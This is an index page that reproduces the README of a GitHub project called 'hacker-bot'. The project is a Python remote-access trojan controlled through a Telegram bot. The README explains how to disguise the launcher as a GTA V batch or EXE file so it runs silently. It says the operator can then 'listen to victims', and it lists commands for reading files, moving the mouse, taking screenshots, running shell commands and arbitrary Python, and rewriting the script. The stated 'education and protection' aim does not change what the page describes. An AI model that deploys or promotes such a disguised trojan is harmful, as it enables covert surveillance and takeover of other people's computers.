An open API service indexing awesome lists of open source software.

https://github.com/ynstf/hacker-bot

this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.
https://github.com/ynstf/hacker-bot

bot hacking payload python telegram-bot

Last synced: 2 months ago
JSON representation

this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.

Awesome Lists containing this project

README

          

# hacker-bot
this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.

by clicking on the bat file it will show the GTA V logo and run the script silently in the background.

you can convert this gta v.BAT to an EXE file and change its shortcut's icon.

after the script is run you can listen to victims in the telegram chat bot, who you put its token in main.py.

the goal of this repository is to education and protection!.

![image](https://user-images.githubusercontent.com/107154559/214831409-b20224c2-e120-4e93-8006-7944d5bdc3ba.png)

# menu

*******************************
to test :

hi --> this script is raning by the victim
*******************************
to write a windows command :

$ ipconfig

$ time --> time : 16:11:00,73

$ ping 192.168.1.1
*******************************
to control the mouse :

mouse x y --> mouse 90 90
*******************************
click --> to click
*******************************
screen --> to take screen
*******************************
to show myself :

show --> (script)
*******************************
to edit me :

edit (script) --> DONE!
*******************************
to run python code :

rc with open("hack.txt", "a+") as f:

f.write("hacked!")

f.close
*******************************
to close :

-exit

-$ taskkill /f /im pythonw.exe
*******************************

![My Project2](https://user-images.githubusercontent.com/107154559/214876469-7a9bdd84-dd44-456f-b4be-b24018f3c795.gif)